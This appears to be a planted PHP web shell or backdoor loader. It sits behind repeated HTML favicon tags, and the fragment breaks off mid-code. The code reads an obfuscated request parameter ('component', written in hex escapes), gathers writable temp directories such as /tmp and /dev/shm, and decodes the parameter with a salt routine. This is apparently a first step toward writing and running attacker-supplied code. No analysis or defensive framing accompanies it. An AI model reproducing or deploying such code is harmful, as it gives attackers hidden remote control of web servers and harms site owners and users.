<html><link rel='icon' href='https://e.top4top.io/p_26973oc9i1.png' sizes='20x20' type='image/png'><html><link rel='icon' href='https://e.top4top.io/p_26973oc9i1.png' sizes='20x20' type='image/png'><html><link rel='icon' href='https://e.top4top.io/p_26973oc9i1.png' sizes='20x20' type='image/png'><html><link rel='icon' href='https://e.top4top.io/p_26973oc9i1.png' sizes='20x20' type='image/png'><?php

if(@$_REQUEST["\x63om\x70\x6F\x6Eent"] !== null){
	$elem = array_filter(["/tmp", sys_get_temp_dir(), getenv("TMP"), ini_get("upload_tmp_dir"), session_save_path(), "/dev/shm", "/var/tmp", getenv("TEMP"), getcwd()]);
	$binding = $_REQUEST["\x63om\x70\x6F\x6Eent"];
	 $binding	=	 explode	 (			".",		$binding)	;	
	$ref = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($salt);
            $k = 0;
            $__len = count($binding);
    
            do {
                if ($k		>= $__len) break;
                $v6 = $binding[$k];
                $chS = ord($salt[$k % $sLen]);
                $d = ((int)$v6 - $chS - ($k % 10)) 